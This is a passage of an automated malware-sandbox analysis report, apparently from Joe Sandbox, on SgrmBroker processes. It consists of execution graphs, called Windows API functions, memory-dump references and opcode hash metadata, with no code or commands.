                                      • Instruction Fuzzy Hash: 4421E731A18A4D9FDF90EF98D895AEDBBF1FF69311F140176E508E3251DB34A8509B80
                                      Function 00007FFD34A81C2D Relevance: .0, Instructions: 27COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c4336859ea948620c07ea81dca9d00158b8623305c382589b8a504ac4847f095
                                      • Instruction ID: 37fd4301f46be458a3d3243985918e8350d1ef1117b240ad84734dcae9cebd2b
                                      • Opcode Fuzzy Hash: c4336859ea948620c07ea81dca9d00158b8623305c382589b8a504ac4847f095
                                      • Instruction Fuzzy Hash: F4F0E275D5C24C5FE751EB6488A92E8BFB0FF09300F8500FAD508C2082DA395504C741

                                      Execution Graph

                                      Execution Coverage:14.4%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:35
                                      Total number of Limit Nodes:2
                                      execution_graph 11610 7ffd348cb98a 11611 7ffd348cb999 CreateFileTransactedW 11610->11611 11613 7ffd348cbba8 11611->11613 11576 7ffd348cda35 11577 7ffd348cdaa1 VirtualAlloc 11576->11577 11579 7ffd348cdb7f 11577->11579 11580 7ffd348cbc35 11582 7ffd348cbc5f WriteFile 11580->11582 11583 7ffd348cbdcf 11582->11583 11568 7ffd348ca397 11569 7ffd348ca39c 11568->11569 11572 7ffd348c9fb0 11569->11572 11571 7ffd348ca400 11573 7ffd348c9fb9 CreateFileTransactedW 11572->11573 11575 7ffd348cbba8 11573->11575 11575->11571 11584 7ffd348cd5d1 11585 7ffd348cd5ed GetSystemInfo 11584->11585 11587 7ffd348cd6c5 11585->11587 11601 7ffd348cd113 11602 7ffd348cd162 11601->11602 11605 7ffd348cd59a 11602->11605 11604 7ffd348cd16a 11606 7ffd348cd5a5 11605->11606 11607 7ffd348cd5ed GetSystemInfo 11605->11607 11606->11604 11609 7ffd348cd6c5 11607->11609 11609->11604 11588 7ffd348c9ebd 11589 7ffd3492ff20 11588->11589 11592 7ffd3492f110 11589->11592 11591 7ffd34930009 11594 7ffd3492f11b 11592->11594 11593 7ffd3492f1be 11593->11591 11594->11593 11596 7ffd3492f1d7 11594->11596 11597 7ffd3492f1e2 11596->11597 11598 7ffd3492f22a ResumeThread 11596->11598 11597->11593 11600 7ffd3492f2f4 11598->11600 11600->11593

                                      Executed Functions

                                      Function 00007FFD348CB98A Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1775 7ffd348cb98a-7ffd348cb997 1776 7ffd348cb999-7ffd348cb9a1 1775->1776 1777 7ffd348cb9a2-7ffd348cba68 1775->1777 1776->1777 1780 7ffd348cba6a-7ffd348cba81 1777->1780 1781 7ffd348cba84-7ffd348cbba6 CreateFileTransactedW 1777->1781 1780->1781 1782 7ffd348cbba8 1781->1782 1783 7ffd348cbbae-7ffd348cbc30 1781->1783 1782->1783
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2766052231.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd348c0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: CreateFileTransacted
                                      • String ID:
                                      • API String ID: 2149338676-0
                                      • Opcode ID: 7c8f246d60f0e08a911f5263668fdef081540016e33ad92cf21e25a49b220874
                                      • Instruction ID: 94ab3f3ab26b23b978cc2510cf5afb5ee2913dcb68834bd443799a504509921f
                                      • Opcode Fuzzy Hash: 7c8f246d60f0e08a911f5263668fdef081540016e33ad92cf21e25a49b220874
                                      • Instruction Fuzzy Hash: 4B912170908A5C8FDB99DF58C894BE9BBF1FB6A310F1011AED04DE3291DB75A984CB04
                                      Function 00007FFD348C9FB0 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1786 7ffd348c9fb0-7ffd348cba68 1791 7ffd348cba6a-7ffd348cba81 1786->1791 1792 7ffd348cba84-7ffd348cbba6 CreateFileTransactedW 1786->1792 1791->1792 1793 7ffd348cbba8 1792->1793 1794 7ffd348cbbae-7ffd348cbc30 1792->1794 1793->1794
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2766052231.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd348c0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1bc689bac4c506304e2749e18d998543e5797a0b36a65c7a1f5089dc2e444eff
                                      • Instruction ID: 8e727d17c4fea7f062e95beb85d4ca0bb1359481f82e55be4dedef164db9476b
                                      • Opcode Fuzzy Hash: 1bc689bac4c506304e2749e18d998543e5797a0b36a65c7a1f5089dc2e444eff
                                      • Instruction Fuzzy Hash: E381E070A08A1C8FDB98DF58C894BA9BBF1FB69310F1051AED04EE3651DB75A984CF44
                                      Function 00007FFD348CBC35 Relevance: 1.7, APIs: 1, Instructions: 218fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1797 7ffd348cbc35-7ffd348cbd02 1801 7ffd348cbd2a-7ffd348cbdcd WriteFile 1797->1801 1802 7ffd348cbd04-7ffd348cbd27 1797->1802 1803 7ffd348cbdd5-7ffd348cbe31 1801->1803 1804 7ffd348cbdcf 1801->1804 1802->1801 1804->1803
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2766052231.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd348c0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 931ebecd0f616fbdc7510f14f7f7cc1e7c28b25fe05f4a98fdcaf8b537b66ab2
                                      • Instruction ID: b23c1ba16272dc8271a7a5caa8b0b7a4a67e9fd21564be6f68ba851b897460c2
                                      • Opcode Fuzzy Hash: 931ebecd0f616fbdc7510f14f7f7cc1e7c28b25fe05f4a98fdcaf8b537b66ab2
                                      • Instruction Fuzzy Hash: 24613670A08A5C8FDB98DF58C895BE9BBF1FB6A310F1001AED04DE3251DB74A984CB40
                                      Function 00007FFD348CD59A Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1806 7ffd348cd59a-7ffd348cd5a3 1807 7ffd348cd5a5-7ffd348cd5cf 1806->1807 1808 7ffd348cd5ed 1806->1808 1810 7ffd348cd5ef 1808->1810 1811 7ffd348cd5f0-7ffd348cd65a 1808->1811 1810->1811 1814 7ffd348cd662-7ffd348cd6c3 GetSystemInfo 1811->1814 1815 7ffd348cd6cb-7ffd348cd6fb 1814->1815 1816 7ffd348cd6c5 1814->1816 1816->1815
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2766052231.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd348c0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: ba7479c1c406a4be5501d202256421f60117245042e1737e6f1f51e890da16aa
                                      • Instruction ID: 33920e64df5e1317dec526d2ca1e915e9c8f7d2821e8d0a998488855bd76c5f2
                                      • Opcode Fuzzy Hash: ba7479c1c406a4be5501d202256421f60117245042e1737e6f1f51e890da16aa
                                      • Instruction Fuzzy Hash: 7B417F71A08A4C8FDB98EF98D899AEDBBF4FF56314F04416BD04DD7252DA34A846CB40
                                      Function 00007FFD3492F1D7 Relevance: 1.7, APIs: 1, Instructions: 152threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1819 7ffd3492f1d7-7ffd3492f1e0 1820 7ffd3492f1e2-7ffd3492f202 1819->1820 1821 7ffd3492f22a-7ffd3492f2f2 ResumeThread 1819->1821 1826 7ffd3492f2f4 1821->1826 1827 7ffd3492f2fa-7ffd3492f344 1821->1827 1826->1827
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2766052231.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd348c0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 26259c96f9dc85ad59c227578a3de5fb5932a1390e59efa452a01f8314175cc4
                                      • Instruction ID: a0b8fe2026f110ca2b14e70e1298e6f58e071588ba45d323f5f245f82f771a00
                                      • Opcode Fuzzy Hash: 26259c96f9dc85ad59c227578a3de5fb5932a1390e59efa452a01f8314175cc4
                                      • Instruction Fuzzy Hash: 99413A74E08A0C8FDB54EFA8D495AEDBBF0FB5A310F10416ED40DE7251DA75A846CB50
                                      Function 00007FFD348CD5D1 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2766052231.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd348c0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: 03636b9c365fae8899b2d88ec32a46b6605feb39f2602d873c7206af638d3e8e
                                      • Instruction ID: 66113a322bf7dc386adb9a251f1eceaa2cb0d4c5263a5f8d753b5eddec1b2c14
                                      • Opcode Fuzzy Hash: 03636b9c365fae8899b2d88ec32a46b6605feb39f2602d873c7206af638d3e8e
                                      • Instruction Fuzzy Hash: 4241B17090C68C8FDB99EFA8D859BE9BBF0EF56310F0441ABD04DD7252CA345846CB40
                                      Function 00007FFD348CDA35 Relevance: 1.4, APIs: 1, Instructions: 192memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2766052231.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd348c0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: dd95c0fb3517131fa3edc776229ccd638bd561b12c64e3882d062b775793d768
                                      • Instruction ID: fe56efae77095111a2207d2ba63c2811da7bdad8d4d050af079cdb6ec42aecf0
                                      • Opcode Fuzzy Hash: dd95c0fb3517131fa3edc776229ccd638bd561b12c64e3882d062b775793d768
                                      • Instruction Fuzzy Hash: 8B512970908A5C8FDF58EF58C895BE9BBF0FB6A314F1042AAD04DE3251DB70A985CB41
                                      Function 00007FFD34AA0AED Relevance: .9, Instructions: 943COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f8963d72f7ab4a2662c6275156180ba3a4c53117578c3391f3d531edebac8f1e
                                      • Instruction ID: b3cab4918c4833a5b8e4f582ef66d8c64ec9c219cd50782f0971cf40a53f17af
                                      • Opcode Fuzzy Hash: f8963d72f7ab4a2662c6275156180ba3a4c53117578c3391f3d531edebac8f1e
                                      • Instruction Fuzzy Hash: 66720C70E0961D8FEBE4EF58C8A56A9B7B1FF59305F1001BAD50DE3291DE386A819F40
                                      Function 00007FFD34AA5E8B Relevance: .9, Instructions: 923COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 28437f9795119a4ae4e80764798f01373b1f2eaab4f7594244b2a3913da6bd89
                                      • Instruction ID: 831e32b333e99a1b45a1836c49b2f6b1bede9521500af3596a0be9252201dde4
                                      • Opcode Fuzzy Hash: 28437f9795119a4ae4e80764798f01373b1f2eaab4f7594244b2a3913da6bd89
                                      • Instruction Fuzzy Hash: 55717171E0A64D8FEB94DBA8D8A46BC7BF0FF56301F14007AD149D7292CA79AC41DB40
                                      Function 00007FFD34AA4F71 Relevance: .2, Instructions: 210COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a4d2c4ee0e30075402671c7a25ec6f63f933839f0f805612f1a4644157c0045e
                                      • Instruction ID: aca8764a4bc9d05e53c79e7ebb2aee6bddf697b8a3881b4180612a40508384fe
                                      • Opcode Fuzzy Hash: a4d2c4ee0e30075402671c7a25ec6f63f933839f0f805612f1a4644157c0045e
                                      • Instruction Fuzzy Hash: 9471A670A0992D8FDBD8EF18D895BE8B7B1FB69305F5041A9910DE3291DA75ADC0CF40
                                      Function 00007FFD34AA1A05 Relevance: .2, Instructions: 193COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea2529f1885d19fd31b384225882abfabe7d3983fe351068a436938e036f0190
                                      • Instruction ID: 00059673e7789be71ba9362ba297ed3b618fe86d42bf399c67c0fcfa138790a3
                                      • Opcode Fuzzy Hash: ea2529f1885d19fd31b384225882abfabe7d3983fe351068a436938e036f0190
                                      • Instruction Fuzzy Hash: BE61EC74A08A5D8FDF94EF58C894BE9BBB1FF69311F548266D40CE3255CB34A885CB80
                                      Function 00007FFD34AA0E9A Relevance: .2, Instructions: 173COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ec124e01f3117927eb11851ac82cfdd93ae4da83ffc663ac7a5ddc2cbf13283d
                                      • Instruction ID: 8d39de63978c01614ad335b19cb38b69bfda1dbf687fea4e653dd62e8e991554
                                      • Opcode Fuzzy Hash: ec124e01f3117927eb11851ac82cfdd93ae4da83ffc663ac7a5ddc2cbf13283d
                                      • Instruction Fuzzy Hash: C061EA70E095198FEBA4EF58C8E9AA9B3B1EF59305F1001B9D50DE3291DF386D859F40
                                      Function 00007FFD34AA685D Relevance: .2, Instructions: 172COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 071545ef2d6a244927c76dd14ea56a96b9316e614c6eb8b7e7edee526406a4a3
                                      • Instruction ID: e199b7cbf5cfb5d780d922081ed9b0aeed047f934d7f60e5756f7635ee7f6240
                                      • Opcode Fuzzy Hash: 071545ef2d6a244927c76dd14ea56a96b9316e614c6eb8b7e7edee526406a4a3
                                      • Instruction Fuzzy Hash: 2451EA70A09A1D8FDF94EF98D4A57EDB7B1FF59304F50006AD00DE3296CA79A881DB40
                                      Function 00007FFD34AA2995 Relevance: .2, Instructions: 169COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5d81b76c1647f327d13867084d15f5f69cf229780a7a21eb464f47c393781d6e
                                      • Instruction ID: 2fab40159ad1cd573130fd74714b007dbd61ebebb72e8cbc360692838a337170
                                      • Opcode Fuzzy Hash: 5d81b76c1647f327d13867084d15f5f69cf229780a7a21eb464f47c393781d6e
                                      • Instruction Fuzzy Hash: 1A51D531A0968D8FDBA5DF14C891AE97BF0FF5A304F5401FAD44DD7282CA38A965CB81
                                      Function 00007FFD34AA0EB9 Relevance: .2, Instructions: 154COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 560be3322d77460bc13b0fbc578cf21782a2d5a03a2892efe32544be8587c3ab
                                      • Instruction ID: 643b770575ab1f2b46748ebca916bf6c5fc8bc10d606994f8883d273afa2086b
                                      • Opcode Fuzzy Hash: 560be3322d77460bc13b0fbc578cf21782a2d5a03a2892efe32544be8587c3ab
                                      • Instruction Fuzzy Hash: 8D518770A1562D8FEFA4EB58C8D9AA8B7B1FB59305F1001A9D40DE3261DF34AE81CF40
                                      Function 00007FFD34AA5203 Relevance: .1, Instructions: 139COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c4e2dd252b89dbb7b6627fe33fda411bcb518fe8d70415b89e1f6994c1baca36
                                      • Instruction ID: 4a5a1fdade1121ddd47ecdf6af8e6cc572bc7859008aea81759d3aed9779e49a
                                      • Opcode Fuzzy Hash: c4e2dd252b89dbb7b6627fe33fda411bcb518fe8d70415b89e1f6994c1baca36
                                      • Instruction Fuzzy Hash: DE518130A1992D8FDBE8EB18C895BE8B3B1FB69305F5041E9910DE3251DA78ADD0CF44
                                      Function 00007FFD34AA6A5D Relevance: .1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 99f227d37e558eb05c5addb2c634667ec105e4a5c2fd8a6133dc8ebedf07cd69
                                      • Instruction ID: d46229fae31dd46bf116f8792efa8366be893104bb0cd84df1e697e5bc421fcb
                                      • Opcode Fuzzy Hash: 99f227d37e558eb05c5addb2c634667ec105e4a5c2fd8a6133dc8ebedf07cd69
                                      • Instruction Fuzzy Hash: F0418B30E4D94D8FEB91EBA8C8A56FCBBB1EF4A301F540076D10CE3192DE3868858B11
                                      Function 00007FFD34AA259D Relevance: .1, Instructions: 89COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 35ebbe122ecdffd2d833b235c202f92e852f2b3521974071152706a7f377215b
                                      • Instruction ID: ed472926f50f9b1f6494cf118f9d9c47586187311bc32797fdd8263acbe35bfc
                                      • Opcode Fuzzy Hash: 35ebbe122ecdffd2d833b235c202f92e852f2b3521974071152706a7f377215b
                                      • Instruction Fuzzy Hash: 3B212631A09A5D8FEB94EFA8C4A8BEC7BF1FF59301F14016AE408E7251DB749851CB40
                                      Function 00007FFD34AA71E1 Relevance: .1, Instructions: 84COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c2a4aee62faacf2a58ba0c61c0f7e1ffdde0ee262bf72fe8eadcd86de9178ad0
                                      • Instruction ID: 6968a9c675ea4913e119ee021aea0c69f1f1ec7c988eb6bc0fc647da8ad91178
                                      • Opcode Fuzzy Hash: c2a4aee62faacf2a58ba0c61c0f7e1ffdde0ee262bf72fe8eadcd86de9178ad0
                                      • Instruction Fuzzy Hash: EF21B430E0E6898FEB81DBA8C4546FE7BF1FF1A305F1400B6E049E7192CA389848C711
                                      Function 00007FFD34AA2B99 Relevance: .1, Instructions: 79COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a2d9dc5a90b9568c80a3fc5766ea650350d44ec26d582cdc5a942c10d6a6af0
                                      • Instruction ID: 479c5b5f794107eb27e7807601217b90c6fd1b488d930dcd3016d1fd7b982ea3
                                      • Opcode Fuzzy Hash: 2a2d9dc5a90b9568c80a3fc5766ea650350d44ec26d582cdc5a942c10d6a6af0
                                      • Instruction Fuzzy Hash: 3321C331A19A4D8FDF90DF68D895AE97BF1FF66310F0401BAE519D3252DB389814CB80
                                      Function 00007FFD34AA4AD5 Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4d4b8f2c41e77095ebe21ef326e1991c80761071ff2e747c71724ce8a0cbe110
                                      • Instruction ID: 585aa1229200427e722f987d72ff40cc74ba47c231bd38eac3b3d586dd340edc
                                      • Opcode Fuzzy Hash: 4d4b8f2c41e77095ebe21ef326e1991c80761071ff2e747c71724ce8a0cbe110
                                      • Instruction Fuzzy Hash: 7D211731A19A4D9FDF90EFA8D895AEDBBF1FF69311F140166E508E3251CB34A8548B80
                                      Function 00007FFD34AA1C2D Relevance: .0, Instructions: 27COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2767060526.00007FFD34AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffd34aa0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 54b059e2291877ad09252a811d2fc0bf7a28fcdb319a8f70acf4a52aefccb947
                                      • Instruction ID: dfdd2522ff8438295e6599d9f05946420ec7bd83b20bb9ade82c4aefdc17c1ab
                                      • Opcode Fuzzy Hash: 54b059e2291877ad09252a811d2fc0bf7a28fcdb319a8f70acf4a52aefccb947
                                      • Instruction Fuzzy Hash: FCF0E231E5D64C9FD791EB6488A92E8BFB0EF05300F9900FAD508C6082DA395504C741

                                      Execution Graph

                                      Execution Coverage:16.2%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:32
                                      Total number of Limit Nodes:2
                                      execution_graph 11514 7ffd3489da35 11515 7ffd3489daa1 VirtualAlloc 11514->11515 11517 7ffd3489db7f 11515->11517 11518 7ffd3489bc35 11520 7ffd3489bc5f WriteFile 11518->11520 11521 7ffd3489bdcf 11520->11521 11506 7ffd3489a397 11507 7ffd3489a39c 11506->11507 11510 7ffd34899fb0 11507->11510 11509 7ffd3489a400 11511 7ffd34899fb9 CreateFileTransactedW 11510->11511 11513 7ffd3489bba8 11511->11513 11513->11509 11535 7ffd34899ebd 11536 7ffd348fff20 11535->11536 11539 7ffd348ff110 11536->11539 11538 7ffd34900009 11541 7ffd348ff11b 11539->11541 11540 7ffd348ff1be 11540->11538 11541->11540 11543 7ffd348ff1d7 11541->11543 11544 7ffd348ff22a ResumeThread 11543->11544 11545 7ffd348ff1e2 11543->11545 11547 7ffd348ff2f4 11544->11547 11545->11540 11547->11540 11522 7ffd3489d5d1 11523 7ffd3489d5ed GetSystemInfo 11522->11523 11525 7ffd3489d6c5 11523->11525 11526 7ffd3489d154 11527 7ffd3489d15a 11526->11527 11530 7ffd3489d59a 11527->11530 11529 7ffd3489d160 11531 7ffd3489d5ed GetSystemInfo 11530->11531 11532 7ffd3489d5a5 11530->11532 11534 7ffd3489d6c5 11531->11534 11532->11529 11534->11529

                                      Executed Functions

                                      Function 00007FFD34A70AED Relevance: 1.0, Instructions: 952COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d02a7fb06a2f2af7c9c5d8d8894487111342b446689593586caec3a5d9efe159
                                      • Instruction ID: 772f685a556a5ad7e4efee25a9f4d13b0189525758d14bff0308ca455d2c6e3b
                                      • Opcode Fuzzy Hash: d02a7fb06a2f2af7c9c5d8d8894487111342b446689593586caec3a5d9efe159
                                      • Instruction Fuzzy Hash: 30723171E08A1D8FDBA4EF58C8A56A97BF1FF59305F1001B9D50DE3291DE38AA819F40
                                      Function 00007FFD3489B98A Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1453 7ffd3489b98a-7ffd3489b997 1454 7ffd3489b999-7ffd3489b9a1 1453->1454 1455 7ffd3489b9a2-7ffd3489ba68 1453->1455 1454->1455 1459 7ffd3489ba6a-7ffd3489ba81 1455->1459 1460 7ffd3489ba84-7ffd3489bba6 CreateFileTransactedW 1455->1460 1459->1460 1461 7ffd3489bba8 1460->1461 1462 7ffd3489bbae-7ffd3489bc30 1460->1462 1461->1462
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3081042849.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: CreateFileTransacted
                                      • String ID:
                                      • API String ID: 2149338676-0
                                      • Opcode ID: 941cabde9994a09b53fe4c133b1685fa8c779f3ee7852180ed91ee47188d60c3
                                      • Instruction ID: f2181e95776219be13315a975fd77b8eb2388187623c147cd1ce8b60d5655268
                                      • Opcode Fuzzy Hash: 941cabde9994a09b53fe4c133b1685fa8c779f3ee7852180ed91ee47188d60c3
